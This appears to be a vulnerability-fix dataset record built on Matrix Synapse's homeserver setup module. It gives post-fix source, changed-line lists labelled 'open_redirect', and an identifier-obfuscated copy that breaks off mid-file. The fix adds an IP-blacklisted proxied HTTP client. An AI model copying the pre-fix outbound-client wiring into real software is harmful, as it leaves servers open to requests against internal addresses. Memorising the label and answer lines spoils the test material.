return RoomMemberWorkerHandler(self)
return RoomMemberMasterHandler(self)
@cache_in_self
def get_federation_registry(self) -> FederationHandlerRegistry:
return FederationHandlerRegistry(self)
@cache_in_self
def get_server_notices_manager(self):
if self.config.worker_app:
raise Exception("Workers cannot send server notices")
return ServerNoticesManager(self)
@cache_in_self
def get_server_notices_sender(self):
if self.config.worker_app:
return WorkerServerNoticesSender(self)
return ServerNoticesSender(self)
@cache_in_self
def get_message_handler(self) -> MessageHandler:
return MessageHandler(self)
@cache_in_self
def get_pagination_handler(self) -> PaginationHandler:
return PaginationHandler(self)
@cache_in_self
def get_room_context_handler(self) -> RoomContextHandler:
return RoomContextHandler(self)
@cache_in_self
def get_registration_handler(self) -> RegistrationHandler:
return RegistrationHandler(self)
@cache_in_self
def get_account_validity_handler(self) -> AccountValidityHandler:
return AccountValidityHandler(self)
@cache_in_self
def get_cas_handler(self) -> CasHandler:
return CasHandler(self)
@cache_in_self
def get_saml_handler(self) -> "SamlHandler":
from synapse.handlers.saml_handler import SamlHandler
return SamlHandler(self)
@cache_in_self
def get_oidc_handler(self) -> "OidcHandler":
from synapse.handlers.oidc_handler import OidcHandler
return OidcHandler(self)
@cache_in_self
def get_event_client_serializer(self) -> EventClientSerializer:
return EventClientSerializer(self)
@cache_in_self
def get_password_policy_handler(self) -> PasswordPolicyHandler:
return PasswordPolicyHandler(self)
@cache_in_self
def get_storage(self) -> Storage:
return Storage(self, self.get_datastores())
@cache_in_self
def get_replication_streamer(self) -> ReplicationStreamer:
return ReplicationStreamer(self)
@cache_in_self
def get_replication_data_handler(self) -> ReplicationDataHandler:
return ReplicationDataHandler(self)
@cache_in_self
def get_replication_streams(self) -> Dict[str, Stream]:
return {stream.NAME: stream(self) for stream in STREAMS_MAP.values()}
@cache_in_self
def get_federation_ratelimiter(self) -> FederationRateLimiter:
return FederationRateLimiter(self.get_clock(), config=self.config.rc_federation)
@cache_in_self
def get_module_api(self) -> ModuleApi:
return ModuleApi(self, self.get_auth_handler())
async def remove_pusher(self, app_id: str, push_key: str, user_id: str):
return await self.get_pusherpool().remove_pusher(app_id, push_key, user_id)
def should_send_federation(self) -> bool:
"Should this server be sending federation traffic directly?"
return self.config.send_federation and (
not self.config.worker_app
or self.config.worker_app == "synapse.app.federation_sender"
)
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2017-2018 New Vector Ltd
# Copyright 2019 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This file provides some classes for setting up (partially-populated)
# homeservers; either as a full homeserver as a real application, or a small
# partial one for unit test mocking.
# Imports required for the default HomeServer() implementation
import abc
import functools
import logging
import os
from typing import TYPE_CHECKING, Any, Callable, Dict, List, Optional, TypeVar, cast
import twisted.internet.base
import twisted.internet.tcp
from twisted.mail.smtp import sendmail
from twisted.web.iweb import IPolicyForHTTPS
from synapse.api.auth import Auth
from synapse.api.filtering import Filtering
from synapse.api.ratelimiting import Ratelimiter
from synapse.appservice.api import ApplicationServiceApi
from synapse.appservice.scheduler import ApplicationServiceScheduler
from synapse.config.homeserver import HomeServerConfig
from synapse.crypto import context_factory
from synapse.crypto.context_factory import RegularPolicyForHTTPS
from synapse.crypto.keyring import Keyring
from synapse.events.builder import EventBuilderFactory
from synapse.events.spamcheck import SpamChecker
from synapse.events.third_party_rules import ThirdPartyEventRules
from synapse.events.utils import EventClientSerializer
from synapse.federation.federation_client import FederationClient
from synapse.federation.federation_server import (
FederationHandlerRegistry,
FederationServer,
)
from synapse.federation.send_queue import FederationRemoteSendQueue
from synapse.federation.sender import FederationSender
from synapse.federation.transport.client import TransportLayerClient
from synapse.groups.attestations import GroupAttestationSigning, GroupAttestionRenewer
from synapse.groups.groups_server import GroupsServerHandler, GroupsServerWorkerHandler
from synapse.handlers.account_validity import AccountValidityHandler
from synapse.handlers.acme import AcmeHandler
from synapse.handlers.admin import AdminHandler
from synapse.handlers.appservice import ApplicationServicesHandler
from synapse.handlers.auth import AuthHandler, MacaroonGenerator
from synapse.handlers.cas_handler import CasHandler
from synapse.handlers.deactivate_account import DeactivateAccountHandler
from synapse.handlers.device import DeviceHandler, DeviceWorkerHandler
from synapse.handlers.devicemessage import DeviceMessageHandler
from synapse.handlers.directory import DirectoryHandler
from synapse.handlers.e2e_keys import E2eKeysHandler
from synapse.handlers.e2e_room_keys import E2eRoomKeysHandler
from synapse.handlers.events import EventHandler, EventStreamHandler
from synapse.handlers.federation import FederationHandler
from synapse.handlers.groups_local import GroupsLocalHandler, GroupsLocalWorkerHandler
from synapse.handlers.identity import IdentityHandler
from synapse.handlers.initial_sync import InitialSyncHandler
from synapse.handlers.message import EventCreationHandler, MessageHandler
from synapse.handlers.pagination import PaginationHandler
from synapse.handlers.password_policy import PasswordPolicyHandler
from synapse.handlers.presence import PresenceHandler
from synapse.handlers.profile import ProfileHandler
from synapse.handlers.read_marker import ReadMarkerHandler
from synapse.handlers.receipts import ReceiptsHandler
from synapse.handlers.register import RegistrationHandler
from synapse.handlers.room import (
RoomContextHandler,
RoomCreationHandler,
RoomShutdownHandler,
)
from synapse.handlers.room_list import RoomListHandler
from synapse.handlers.room_member import RoomMemberMasterHandler
from synapse.handlers.room_member_worker import RoomMemberWorkerHandler
from synapse.handlers.search import SearchHandler
from synapse.handlers.set_password import SetPasswordHandler
from synapse.handlers.sso import SsoHandler
from synapse.handlers.stats import StatsHandler
from synapse.handlers.sync import SyncHandler
from synapse.handlers.typing import FollowerTypingHandler, TypingWriterHandler
from synapse.handlers.user_directory import UserDirectoryHandler
from synapse.http.client import InsecureInterceptableContextFactory, SimpleHttpClient
from synapse.http.matrixfederationclient import MatrixFederationHttpClient
from synapse.module_api import ModuleApi
from synapse.notifier import Notifier
from synapse.push.action_generator import ActionGenerator
from synapse.push.pusherpool import PusherPool
from synapse.replication.tcp.client import ReplicationDataHandler
from synapse.replication.tcp.handler import ReplicationCommandHandler
from synapse.replication.tcp.resource import ReplicationStreamer
from synapse.replication.tcp.streams import STREAMS_MAP, Stream
from synapse.rest.media.v1.media_repository import (
MediaRepository,
MediaRepositoryResource,
)
from synapse.secrets import Secrets
from synapse.server_notices.server_notices_manager import ServerNoticesManager
from synapse.server_notices.server_notices_sender import ServerNoticesSender
from synapse.server_notices.worker_server_notices_sender import (
WorkerServerNoticesSender,
)
from synapse.state import StateHandler, StateResolutionHandler
from synapse.storage import Databases, DataStore, Storage
from synapse.streams.events import EventSources
from synapse.types import DomainSpecificString
from synapse.util import Clock
from synapse.util.distributor import Distributor
from synapse.util.ratelimitutils import FederationRateLimiter
from synapse.util.stringutils import random_string
logger = logging.getLogger(__name__)
if TYPE_CHECKING:
from synapse.handlers.oidc_handler import OidcHandler
from synapse.handlers.saml_handler import SamlHandler
T = TypeVar("T", bound=Callable[..., Any])
def cache_in_self(builder: T) -> T:
"""Wraps a function called e.g. `get_foo`, checking if `self.foo` exists and
returning if so. If not, calls the given function and sets `self.foo` to it.
Also ensures that dependency cycles throw an exception correctly, rather
than overflowing the stack.
"""
if not builder.__name__.startswith("get_"):
raise Exception(
"@cache_in_self can only be used on functions starting with `get_`"
)
# get_attr -> _attr
depname = builder.__name__[len("get") :]
building = [False]
@functools.wraps(builder)
def _get(self):
try:
return getattr(self, depname)
except AttributeError:
pass
# Prevent cyclic dependencies from deadlocking
if building[0]:
raise ValueError("Cyclic dependency while building %s" % (depname,))
building[0] = True
try:
dep = builder(self)
setattr(self, depname, dep)
finally:
building[0] = False
return dep
# We cast here as we need to tell mypy that `_get` has the same signature as
# `builder`.
return cast(T, _get)
class HomeServer(metaclass=abc.ABCMeta):
"""A basic homeserver object without lazy component builders.
This will need all of the components it requires to either be passed as
constructor arguments, or the relevant methods overriding to create them.
Typically this would only be used for unit tests.
Dependencies should be added by creating a `def get_<depname>(self)`
function, wrapping it in `@cache_in_self`.
Attributes:
config (synapse.config.homeserver.HomeserverConfig):
_listening_services (list[twisted.internet.tcp.Port]): TCP ports that
we are listening on to provide HTTP services.
"""
REQUIRED_ON_BACKGROUND_TASK_STARTUP = [
"account_validity",
"auth",
"deactivate_account",
"message",
"pagination",
"profile",
"stats",
]
# This is overridden in derived application classes
# (such as synapse.app.homeserver.SynapseHomeServer) and gives the class to be
# instantiated during setup() for future return by get_datastore()
DATASTORE_CLASS = abc.abstractproperty()
def __init__(
self,
hostname: str,
config: HomeServerConfig,
reactor=None,
version_string="Synapse",
):
"""
Args:
hostname : The hostname for the server.
config: The full config for the homeserver.
"""
if not reactor:
from twisted.internet import reactor as _reactor
reactor = _reactor
self._reactor = reactor
self.hostname = hostname
# the key we use to sign events and requests
self.signing_key = config.key.signing_key[0]
self.config = config
self._listening_services = [] # type: List[twisted.internet.tcp.Port]
self.start_time = None # type: Optional[int]
self._instance_id = random_string(5)
self._instance_name = config.worker_name or "master"
self.version_string = version_string
self.datastores = None # type: Optional[Databases]
def get_instance_id(self) -> str:
"""A unique ID for this synapse process instance.
This is used to distinguish running instances in worker-based
deployments.
"""
return self._instance_id
def get_instance_name(self) -> str:
"""A unique name for this synapse process.
Used to identify the process over replication and in config. Does not
change over restarts.
"""
return self._instance_name
def setup(self) -> None:
logger.info("Setting up.")
self.start_time = int(self.get_clock().time())
self.datastores = Databases(self.DATASTORE_CLASS, self)
logger.info("Finished setting up.")
# Register background tasks required by this server. This must be done
# somewhat manually due to the background tasks not being registered
# unless handlers are instantiated.
if self.config.run_background_tasks:
self.setup_background_tasks()
def setup_background_tasks(self) -> None:
"""
Some handlers have side effects on instantiation (like registering
background updates). This function causes them to be fetched, and
therefore instantiated, to run those side effects.
"""
for i in self.REQUIRED_ON_BACKGROUND_TASK_STARTUP:
getattr(self, "get_" + i + "_handler")()
def get_reactor(self) -> twisted.internet.base.ReactorBase:
"""
Fetch the Twisted reactor in use by this HomeServer.
"""
return self._reactor
def get_ip_from_request(self, request) -> str:
# X-Forwarded-For is handled by our custom request type.
return request.getClientIP()
def is_mine(self, domain_specific_string: DomainSpecificString) -> bool:
return domain_specific_string.domain == self.hostname
def is_mine_id(self, string: str) -> bool:
return string.split(":", 1)[1] == self.hostname
@cache_in_self
def get_clock(self) -> Clock:
return Clock(self._reactor)
def get_datastore(self) -> DataStore:
if not self.datastores:
raise Exception("HomeServer.setup must be called before getting datastores")
return self.datastores.main
def get_datastores(self) -> Databases:
if not self.datastores:
raise Exception("HomeServer.setup must be called before getting datastores")
return self.datastores
def get_config(self) -> HomeServerConfig:
return self.config
@cache_in_self
def get_distributor(self) -> Distributor:
return Distributor()
@cache_in_self
def get_registration_ratelimiter(self) -> Ratelimiter:
return Ratelimiter(
clock=self.get_clock(),
rate_hz=self.config.rc_registration.per_second,
burst_count=self.config.rc_registration.burst_count,
)
@cache_in_self
def get_federation_client(self) -> FederationClient:
return FederationClient(self)
@cache_in_self
def get_federation_server(self) -> FederationServer:
return FederationServer(self)
@cache_in_self
def get_notifier(self) -> Notifier:
return Notifier(self)
@cache_in_self
def get_auth(self) -> Auth:
return Auth(self)
@cache_in_self
def get_http_client_context_factory(self) -> IPolicyForHTTPS:
return (
InsecureInterceptableContextFactory()
if self.config.use_insecure_ssl_client_just_for_testing_do_not_use
else RegularPolicyForHTTPS()
)
@cache_in_self
def get_simple_http_client(self) -> SimpleHttpClient:
"""
An HTTP client with no special configuration.
"""
return SimpleHttpClient(self)
@cache_in_self
def get_proxied_http_client(self) -> SimpleHttpClient:
"""
An HTTP client that uses configured HTTP(S) proxies.
"""
return SimpleHttpClient(
self,
http_proxy=os.getenvb(b"http_proxy"),
https_proxy=os.getenvb(b"HTTPS_PROXY"),
)
@cache_in_self
def get_proxied_blacklisted_http_client(self) -> SimpleHttpClient:
"""
An HTTP client that uses configured HTTP(S) proxies and blacklists IPs
based on the IP range blacklist.
"""
return SimpleHttpClient(
self,
ip_blacklist=self.config.ip_range_blacklist,
http_proxy=os.getenvb(b"http_proxy"),
https_proxy=os.getenvb(b"HTTPS_PROXY"),
)
@cache_in_self
def get_federation_http_client(self) -> MatrixFederationHttpClient:
"""
An HTTP client for federation.
"""
tls_client_options_factory = context_factory.FederationPolicyForHTTPS(
self.config
)
return MatrixFederationHttpClient(self, tls_client_options_factory)
@cache_in_self
def get_room_creation_handler(self) -> RoomCreationHandler:
return RoomCreationHandler(self)
@cache_in_self
def get_room_shutdown_handler(self) -> RoomShutdownHandler:
return RoomShutdownHandler(self)
@cache_in_self
def get_sendmail(self) -> sendmail:
return sendmail
@cache_in_self
def get_state_handler(self) -> StateHandler:
return StateHandler(self)
@cache_in_self
def get_state_resolution_handler(self) -> StateResolutionHandler:
return StateResolutionHandler(self)
@cache_in_self
def get_presence_handler(self) -> PresenceHandler:
return PresenceHandler(self)
@cache_in_self
def get_typing_handler(self):
if self.config.worker.writers.typing == self.get_instance_name():
return TypingWriterHandler(self)
else:
return FollowerTypingHandler(self)
@cache_in_self
def get_sso_handler(self) -> SsoHandler:
return SsoHandler(self)
@cache_in_self
def get_sync_handler(self) -> SyncHandler:
return SyncHandler(self)
@cache_in_self
def get_room_list_handler(self) -> RoomListHandler:
return RoomListHandler(self)
@cache_in_self
def get_auth_handler(self) -> AuthHandler:
return AuthHandler(self)
@cache_in_self
def get_macaroon_generator(self) -> MacaroonGenerator:
return MacaroonGenerator(self)
@cache_in_self
def get_device_handler(self):
if self.config.worker_app:
return DeviceWorkerHandler(self)
else:
return DeviceHandler(self)
@cache_in_self
def get_device_message_handler(self) -> DeviceMessageHandler:
return DeviceMessageHandler(self)
@cache_in_self
def get_directory_handler(self) -> DirectoryHandler:
return DirectoryHandler(self)
@cache_in_self
def get_e2e_keys_handler(self) -> E2eKeysHandler:
return E2eKeysHandler(self)
@cache_in_self
def get_e2e_room_keys_handler(self) -> E2eRoomKeysHandler:
return E2eRoomKeysHandler(self)
@cache_in_self
def get_acme_handler(self) -> AcmeHandler:
return AcmeHandler(self)
@cache_in_self
def get_admin_handler(self) -> AdminHandler:
return AdminHandler(self)
@cache_in_self
def get_application_service_api(self) -> ApplicationServiceApi:
return ApplicationServiceApi(self)
@cache_in_self
def get_application_service_scheduler(self) -> ApplicationServiceScheduler:
return ApplicationServiceScheduler(self)
@cache_in_self
def get_application_service_handler(self) -> ApplicationServicesHandler:
return ApplicationServicesHandler(self)
@cache_in_self
def get_event_handler(self) -> EventHandler:
return EventHandler(self)
@cache_in_self
def get_event_stream_handler(self) -> EventStreamHandler:
return EventStreamHandler(self)
@cache_in_self
def get_federation_handler(self) -> FederationHandler:
return FederationHandler(self)
@cache_in_self
def get_identity_handler(self) -> IdentityHandler:
return IdentityHandler(self)
@cache_in_self
def get_initial_sync_handler(self) -> InitialSyncHandler:
return InitialSyncHandler(self)
@cache_in_self
def get_profile_handler(self):
return ProfileHandler(self)
@cache_in_self
def get_event_creation_handler(self) -> EventCreationHandler:
return EventCreationHandler(self)
@cache_in_self
def get_deactivate_account_handler(self) -> DeactivateAccountHandler:
return DeactivateAccountHandler(self)
@cache_in_self
def get_search_handler(self) -> SearchHandler:
return SearchHandler(self)
@cache_in_self
def get_set_password_handler(self) -> SetPasswordHandler:
return SetPasswordHandler(self)
@cache_in_self
def get_event_sources(self) -> EventSources:
return EventSources(self)
@cache_in_self
def get_keyring(self) -> Keyring:
return Keyring(self)
@cache_in_self
def get_event_builder_factory(self) -> EventBuilderFactory:
return EventBuilderFactory(self)
@cache_in_self
def get_filtering(self) -> Filtering:
return Filtering(self)
@cache_in_self
def get_pusherpool(self) -> PusherPool:
return PusherPool(self)
@cache_in_self
def get_media_repository_resource(self) -> MediaRepositoryResource:
# build the media repo resource. This indirects through the HomeServer
# to ensure that we only have a single instance of
return MediaRepositoryResource(self)
@cache_in_self
def get_media_repository(self) -> MediaRepository:
return MediaRepository(self)
@cache_in_self
def get_federation_transport_client(self) -> TransportLayerClient:
return TransportLayerClient(self)
@cache_in_self
def get_federation_sender(self):
if self.should_send_federation():
return FederationSender(self)
elif not self.config.worker_app:
return FederationRemoteSendQueue(self)
else:
raise Exception("Workers cannot send federation traffic")
@cache_in_self
def get_receipts_handler(self) -> ReceiptsHandler:
return ReceiptsHandler(self)
@cache_in_self
def get_read_marker_handler(self) -> ReadMarkerHandler:
return ReadMarkerHandler(self)
@cache_in_self
def get_tcp_replication(self) -> ReplicationCommandHandler:
return ReplicationCommandHandler(self)
@cache_in_self
def get_action_generator(self) -> ActionGenerator:
return ActionGenerator(self)
@cache_in_self
def get_user_directory_handler(self) -> UserDirectoryHandler:
return UserDirectoryHandler(self)
@cache_in_self
def get_groups_local_handler(self):
if self.config.worker_app:
return GroupsLocalWorkerHandler(self)
else:
return GroupsLocalHandler(self)
@cache_in_self
def get_groups_server_handler(self):
if self.config.worker_app:
return GroupsServerWorkerHandler(self)
else:
return GroupsServerHandler(self)
@cache_in_self
def get_groups_attestation_signing(self) -> GroupAttestationSigning:
return GroupAttestationSigning(self)
@cache_in_self
def get_groups_attestation_renewer(self) -> GroupAttestionRenewer:
return GroupAttestionRenewer(self)
@cache_in_self
def get_secrets(self) -> Secrets:
return Secrets()
@cache_in_self
def get_stats_handler(self) -> StatsHandler:
return StatsHandler(self)
@cache_in_self
def get_spam_checker(self):
return SpamChecker(self)
@cache_in_self
def get_third_party_event_rules(self) -> ThirdPartyEventRules:
return ThirdPartyEventRules(self)
@cache_in_self
def get_room_member_handler(self):
if self.config.worker_app:
return RoomMemberWorkerHandler(self)
return RoomMemberMasterHandler(self)
@cache_in_self
def get_federation_registry(self) -> FederationHandlerRegistry:
return FederationHandlerRegistry(self)
@cache_in_self
def get_server_notices_manager(self):
if self.config.worker_app:
raise Exception("Workers cannot send server notices")
return ServerNoticesManager(self)
@cache_in_self
def get_server_notices_sender(self):
if self.config.worker_app:
return WorkerServerNoticesSender(self)
return ServerNoticesSender(self)
@cache_in_self
def get_message_handler(self) -> MessageHandler:
return MessageHandler(self)
@cache_in_self
def get_pagination_handler(self) -> PaginationHandler:
return PaginationHandler(self)
@cache_in_self
def get_room_context_handler(self) -> RoomContextHandler:
return RoomContextHandler(self)
@cache_in_self
def get_registration_handler(self) -> RegistrationHandler:
return RegistrationHandler(self)
@cache_in_self
def get_account_validity_handler(self) -> AccountValidityHandler:
return AccountValidityHandler(self)
@cache_in_self
def get_cas_handler(self) -> CasHandler:
return CasHandler(self)
@cache_in_self
def get_saml_handler(self) -> "SamlHandler":
from synapse.handlers.saml_handler import SamlHandler
return SamlHandler(self)
@cache_in_self
def get_oidc_handler(self) -> "OidcHandler":
from synapse.handlers.oidc_handler import OidcHandler
return OidcHandler(self)
@cache_in_self
def get_event_client_serializer(self) -> EventClientSerializer:
return EventClientSerializer(self)
@cache_in_self
def get_password_policy_handler(self) -> PasswordPolicyHandler:
return PasswordPolicyHandler(self)
@cache_in_self
def get_storage(self) -> Storage:
return Storage(self, self.get_datastores())
@cache_in_self
def get_replication_streamer(self) -> ReplicationStreamer:
return ReplicationStreamer(self)
@cache_in_self
def get_replication_data_handler(self) -> ReplicationDataHandler:
return ReplicationDataHandler(self)
@cache_in_self
def get_replication_streams(self) -> Dict[str, Stream]:
return {stream.NAME: stream(self) for stream in STREAMS_MAP.values()}
@cache_in_self
def get_federation_ratelimiter(self) -> FederationRateLimiter:
return FederationRateLimiter(self.get_clock(), config=self.config.rc_federation)
@cache_in_self
def get_module_api(self) -> ModuleApi:
return ModuleApi(self, self.get_auth_handler())
async def remove_pusher(self, app_id: str, push_key: str, user_id: str):
return await self.get_pusherpool().remove_pusher(app_id, push_key, user_id)
def should_send_federation(self) -> bool:
"Should this server be sending federation traffic directly?"
return self.config.send_federation and (
not self.config.worker_app
or self.config.worker_app == "synapse.app.federation_sender"
)
| open_redirect | {
"code": [
" @cache_in_self",
" def get_http_client(self) -> MatrixFederationHttpClient:",
" tls_client_options_factory = context_factory.FederationPolicyForHTTPS(",
" self.config",
" )",
" return MatrixFederationHttpClient(self, tls_client_options_factory)"
],
"line_no": [
517,
518,
519,
520,
521,
522
]
} | {
"code": [
" \"\"\"",
" \"\"\"",
" \"\"\"",
" An HTTP client that uses configured HTTP(S) proxies.",
" return SimpleHttpClient(",
" self,",
" http_proxy=os.getenvb(b\"http_proxy\"),",
" )",
" @cache_in_self",
" \"\"\"",
" An HTTP client that uses configured HTTP(S) proxies and blacklists IPs",
" based on the IP range blacklist.",
" ip_blacklist=self.config.ip_range_blacklist,",
" def get_federation_http_client(self) -> MatrixFederationHttpClient:",
" \"\"\"",
" An HTTP client for federation.",
" tls_client_options_factory = context_factory.FederationPolicyForHTTPS(",
" self.config",
" )",
" return MatrixFederationHttpClient(self, tls_client_options_factory)"
],
"line_no": [
353,
355,
360,
361,
363,
364,
365,
367,
369,
371,
372,
373,
377,
383,
384,
385,
387,
388,
389,
390
]
} |
import abc
import functools
import logging
import os
from typing import .TYPE_CHECKING, Any, Callable, Dict, List, Optional, TypeVar, cast
import twisted.internet.base
import twisted.internet.tcp
from twisted.mail.smtp import sendmail
from twisted.web.iweb import IPolicyForHTTPS
from synapse.api.auth import Auth
from synapse.api.filtering import Filtering
from synapse.api.ratelimiting import Ratelimiter
from synapse.appservice.api import ApplicationServiceApi
from synapse.appservice.scheduler import ApplicationServiceScheduler
from synapse.config.homeserver import .HomeServerConfig
from synapse.crypto import context_factory
from synapse.crypto.context_factory import RegularPolicyForHTTPS
from synapse.crypto.keyring import Keyring
from synapse.events.builder import EventBuilderFactory
from synapse.events.spamcheck import SpamChecker
from synapse.events.third_party_rules import .ThirdPartyEventRules
from synapse.events.utils import EventClientSerializer
from synapse.federation.federation_client import FederationClient
from synapse.federation.federation_server import (
FederationHandlerRegistry,
FederationServer,
)
from synapse.federation.send_queue import FederationRemoteSendQueue
from synapse.federation.sender import FederationSender
from synapse.federation.transport.client import .TransportLayerClient
from synapse.groups.attestations import GroupAttestationSigning, GroupAttestionRenewer
from synapse.groups.groups_server import GroupsServerHandler, GroupsServerWorkerHandler
from synapse.handlers.account_validity import AccountValidityHandler
from synapse.handlers.acme import AcmeHandler
from synapse.handlers.admin import AdminHandler
from synapse.handlers.appservice import ApplicationServicesHandler
from synapse.handlers.auth import AuthHandler, MacaroonGenerator
from synapse.handlers.cas_handler import CasHandler
from synapse.handlers.deactivate_account import DeactivateAccountHandler
from synapse.handlers.device import DeviceHandler, DeviceWorkerHandler
from synapse.handlers.devicemessage import DeviceMessageHandler
from synapse.handlers.directory import DirectoryHandler
from synapse.handlers.e2e_keys import E2eKeysHandler
from synapse.handlers.e2e_room_keys import E2eRoomKeysHandler
from synapse.handlers.events import EventHandler, EventStreamHandler
from synapse.handlers.federation import FederationHandler
from synapse.handlers.groups_local import GroupsLocalHandler, GroupsLocalWorkerHandler
from synapse.handlers.identity import IdentityHandler
from synapse.handlers.initial_sync import InitialSyncHandler
from synapse.handlers.message import EventCreationHandler, MessageHandler
from synapse.handlers.pagination import PaginationHandler
from synapse.handlers.password_policy import PasswordPolicyHandler
from synapse.handlers.presence import PresenceHandler
from synapse.handlers.profile import ProfileHandler
from synapse.handlers.read_marker import ReadMarkerHandler
from synapse.handlers.receipts import ReceiptsHandler
from synapse.handlers.register import RegistrationHandler
from synapse.handlers.room import (
RoomContextHandler,
RoomCreationHandler,
RoomShutdownHandler,
)
from synapse.handlers.room_list import RoomListHandler
from synapse.handlers.room_member import RoomMemberMasterHandler
from synapse.handlers.room_member_worker import RoomMemberWorkerHandler
from synapse.handlers.search import SearchHandler
from synapse.handlers.set_password import SetPasswordHandler
from synapse.handlers.sso import SsoHandler
from synapse.handlers.stats import StatsHandler
from synapse.handlers.sync import SyncHandler
from synapse.handlers.typing import FollowerTypingHandler, TypingWriterHandler
from synapse.handlers.user_directory import UserDirectoryHandler
from synapse.http.client import InsecureInterceptableContextFactory, SimpleHttpClient
from synapse.http.matrixfederationclient import MatrixFederationHttpClient
from synapse.module_api import ModuleApi
from synapse.notifier import Notifier
from synapse.push.action_generator import ActionGenerator
from synapse.push.pusherpool import PusherPool
from synapse.replication.tcp.client import ReplicationDataHandler
from synapse.replication.tcp.handler import ReplicationCommandHandler
from synapse.replication.tcp.resource import ReplicationStreamer
from synapse.replication.tcp.streams import STREAMS_MAP, Stream
from synapse.rest.media.v1.media_repository import (
MediaRepository,
MediaRepositoryResource,
)
from synapse.secrets import Secrets
from synapse.server_notices.server_notices_manager import ServerNoticesManager
from synapse.server_notices.server_notices_sender import ServerNoticesSender
from synapse.server_notices.worker_server_notices_sender import (
WorkerServerNoticesSender,
)
from synapse.state import StateHandler, StateResolutionHandler
from synapse.storage import Databases, DataStore, Storage
from synapse.streams.events import EventSources
from synapse.types import DomainSpecificString
from synapse.util import Clock
from synapse.util.distributor import Distributor
from synapse.util.ratelimitutils import FederationRateLimiter
from synapse.util.stringutils import random_string
VAR_0 = logging.getLogger(__name__)
if TYPE_CHECKING:
from synapse.handlers.oidc_handler import OidcHandler
from synapse.handlers.saml_handler import SamlHandler
VAR_1 = TypeVar("T", bound=Callable[..., Any])
def FUNC_0(VAR_2: VAR_1) -> T:
if not VAR_2.__name__.startswith("get_"):
raise Exception(
"@FUNC_0 can only be used on functions starting with `get_`"
)
VAR_3 = VAR_2.__name__[len("get") :]
VAR_4 = [False]
@functools.wraps(VAR_2)
def FUNC_1(self):
try:
return getattr(self, VAR_3)
except AttributeError:
pass
if VAR_4[0]:
raise ValueError("Cyclic dependency while VAR_4 %s" % (VAR_3,))
VAR_4[0] = True
try:
VAR_18 = VAR_2(self)
setattr(self, VAR_3, VAR_18)
finally:
VAR_4[0] = False
return VAR_18
return cast(VAR_1, FUNC_1)
class CLASS_0(metaclass=abc.ABCMeta):
VAR_5 = [
"account_validity",
"auth",
"deactivate_account",
"message",
"pagination",
"profile",
"stats",
]
VAR_6 = abc.abstractproperty()
def __init__(
self,
VAR_7: str,
VAR_8: HomeServerConfig,
VAR_9=None,
VAR_10="Synapse",
):
if not VAR_9:
from twisted.internet import .reactor as _reactor
VAR_9 = _reactor
self._reactor = VAR_9
self.hostname = VAR_7
self.signing_key = VAR_8.key.signing_key[0]
self.config = VAR_8
self._listening_services = [] # type: List[twisted.internet.tcp.Port]
self.start_time = None # type: Optional[int]
self._instance_id = random_string(5)
self._instance_name = VAR_8.worker_name or "master"
self.version_string = VAR_10
self.datastores = None # type: Optional[Databases]
def FUNC_2(self) -> str:
return self._instance_id
def FUNC_3(self) -> str:
return self._instance_name
def FUNC_4(self) -> None:
VAR_0.info("Setting up.")
self.start_time = int(self.get_clock().time())
self.datastores = Databases(self.DATASTORE_CLASS, self)
VAR_0.info("Finished setting up.")
if self.config.run_background_tasks:
self.setup_background_tasks()
def FUNC_5(self) -> None:
for i in self.REQUIRED_ON_BACKGROUND_TASK_STARTUP:
getattr(self, "get_" + i + "_handler")()
def FUNC_6(self) -> twisted.internet.base.ReactorBase:
return self._reactor
def FUNC_7(self, VAR_11) -> str:
return VAR_11.getClientIP()
def FUNC_8(self, VAR_12: DomainSpecificString) -> bool:
return VAR_12.domain == self.hostname
def FUNC_9(self, VAR_13: str) -> bool:
return VAR_13.split(":", 1)[1] == self.hostname
@FUNC_0
def FUNC_10(self) -> Clock:
return Clock(self._reactor)
def FUNC_11(self) -> DataStore:
if not self.datastores:
raise Exception("HomeServer.setup must be called before getting datastores")
return self.datastores.main
def FUNC_12(self) -> Databases:
if not self.datastores:
raise Exception("HomeServer.setup must be called before getting datastores")
return self.datastores
def FUNC_13(self) -> HomeServerConfig:
return self.config
@FUNC_0
def FUNC_14(self) -> Distributor:
return Distributor()
@FUNC_0
def FUNC_15(self) -> Ratelimiter:
return Ratelimiter(
clock=self.get_clock(),
rate_hz=self.config.rc_registration.per_second,
burst_count=self.config.rc_registration.burst_count,
)
@FUNC_0
def FUNC_16(self) -> FederationClient:
return FederationClient(self)
@FUNC_0
def FUNC_17(self) -> FederationServer:
return FederationServer(self)
@FUNC_0
def FUNC_18(self) -> Notifier:
return Notifier(self)
@FUNC_0
def FUNC_19(self) -> Auth:
return Auth(self)
@FUNC_0
def FUNC_20(self) -> IPolicyForHTTPS:
return (
InsecureInterceptableContextFactory()
if self.config.use_insecure_ssl_client_just_for_testing_do_not_use
else RegularPolicyForHTTPS()
)
@FUNC_0
def FUNC_21(self) -> SimpleHttpClient:
return SimpleHttpClient(self)
@FUNC_0
def FUNC_22(self) -> SimpleHttpClient:
return SimpleHttpClient(
self,
http_proxy=os.getenvb(b"http_proxy"),
https_proxy=os.getenvb(b"HTTPS_PROXY"),
)
@FUNC_0
def FUNC_23(self) -> RoomCreationHandler:
return RoomCreationHandler(self)
@FUNC_0
def FUNC_24(self) -> RoomShutdownHandler:
return RoomShutdownHandler(self)
@FUNC_0
def FUNC_25(self) -> sendmail:
return sendmail
@FUNC_0
def FUNC_26(self) -> StateHandler:
return StateHandler(self)
@FUNC_0
def FUNC_27(self) -> StateResolutionHandler:
return StateResolutionHandler(self)
@FUNC_0
def FUNC_28(self) -> PresenceHandler:
return PresenceHandler(self)
@FUNC_0
def FUNC_29(self):
if self.config.worker.writers.typing == self.get_instance_name():
return TypingWriterHandler(self)
else:
return FollowerTypingHandler(self)
@FUNC_0
def FUNC_30(self) -> SsoHandler:
return SsoHandler(self)
@FUNC_0
def FUNC_31(self) -> SyncHandler:
return SyncHandler(self)
@FUNC_0
def FUNC_32(self) -> RoomListHandler:
return RoomListHandler(self)
@FUNC_0
def FUNC_33(self) -> AuthHandler:
return AuthHandler(self)
@FUNC_0
